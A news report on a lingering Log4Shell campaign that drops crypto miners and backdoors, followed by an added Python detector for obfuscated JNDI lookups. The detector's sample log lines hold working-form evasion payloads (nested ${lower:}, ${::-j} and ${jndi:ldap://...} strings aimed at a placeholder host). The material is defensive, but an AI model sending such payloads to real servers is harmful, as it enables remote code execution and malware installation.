More than two years after the critical Log4j zero-day sparked chaos around the world, organizations are still being hit by exploits pushing crypto-currency miners and malicious backdoor scripts.
According to researchers at Datadog Security Labs, opportunistic cybercriminals are still finding targets for ‘Log4Shell’ exploits that evade detection and plant malware scripts on unpatched corporate systems.
The Datadog discovery highlights the long tail of risk from critical vulnerabilities that remain unpatched years after fixes are available, even for remote code execution issues known to be actively exploited.
The Log4j flaw, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba Cloud security team in November 2021. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Nation-state APT actors linked to China, Iran, North Korea and Turkey have added exploits for the code-execution flaw into their hacking toolkits, and malware hunters have also spotted ransomware and botnet gangs launching Log4j exploits.
Security experts have warned that eradicating the problem will be a long, laborious process because of software dependencies and so-called “transitive dependencies” that make patching very difficult.
In the latest campaign, Datadog researchers discovered the attackers using obfuscated LDAP requests to evade detection, leading to the execution of malicious scripts on compromised systems.
“On July 30, 2024, one of our Confluence honeypots built with HASH received what appeared to be a traditional Log4Shell exploitation probe at a known Tor exit node. Upon further analysis, we discovered a new opportunistic campaign leading to XMRig deployment for crypto mining,” the company said.
The attackers are also planting scripts to establish persistence, exfiltrate data, and maintain control through multiple backdoors and encrypted communication channels.
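The evasion described above relies on Log4j 2's own nested lookup syntax (`${lower:...}`, `${upper:...}` and the `${name:-default}` fallback) to split up the `jndi:` string so a plain substring match never sees it. As an added illustration, not Datadog's code or detection logic, the Python below collapses those forms before matching and runs the check over constructed sample access-log lines (the addresses and paths are made up).

```python
import re

# Innermost ${...} lookup: a body with no nested "${" inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")
# A collapsed JNDI lookup such as ${jndi:ldap://...}; Log4j 2 lookup names are case-insensitive.
JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)

def _resolve(body):
    """Evaluate one innermost lookup as Log4j 2's interpolator would; None = leave untouched."""
    if body.startswith("lower:"):
        return body[6:].lower()
    if body.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body and not body.startswith("jndi:"):
        # Default-value syntax ${name:-default}: assume the variable (often empty,
        # as in ${::-j}) is undefined on the target, so the default is substituted.
        return body.split(":-", 1)[1]
    return None

def _sub(m):
    r = _resolve(m.group(1))
    return m.group(0) if r is None else r

def normalize_lookups(text, max_rounds=32):
    """Collapse innermost lookups repeatedly until the string stops changing."""
    for _ in range(max_rounds):
        new = INNER.sub(_sub, text)
        if new == text:
            break
        text = new
    return text

def jndi_scheme(line):
    """Return the JNDI URL scheme (ldap, rmi, dns, ...) found after de-obfuscation, else None."""
    m = JNDI.search(normalize_lookups(line))
    return m.group(1).lower() if m else None

def scan(lines):
    """Pair each line's detected scheme with a naive substring check, to show what the naive check misses."""
    return [(jndi_scheme(l), "${jndi:" in l.lower()) for l in lines]

# Constructed sample access-log lines (203.0.113.0/24 is a documentation range, not a real host).
SAMPLE_LOG = [
    '10.0.0.1 - - "GET /login HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.2 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.5:1389/a}"',
    '10.0.0.3 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/a}"',
    '10.0.0.4 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://203.0.113.5:1389/a}"',
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:rmi://203.0.113.5:1099/b}"',
]
```

Calling `scan(SAMPLE_LOG)` returns `None` for the benign line and the scheme for every probe, while the naive substring check only flags the unobfuscated one; a real Log4j 2 instance may resolve `${env:...:-x}` to a defined variable instead of the default, so treat this normalization as a detection heuristic, not an exact emulation.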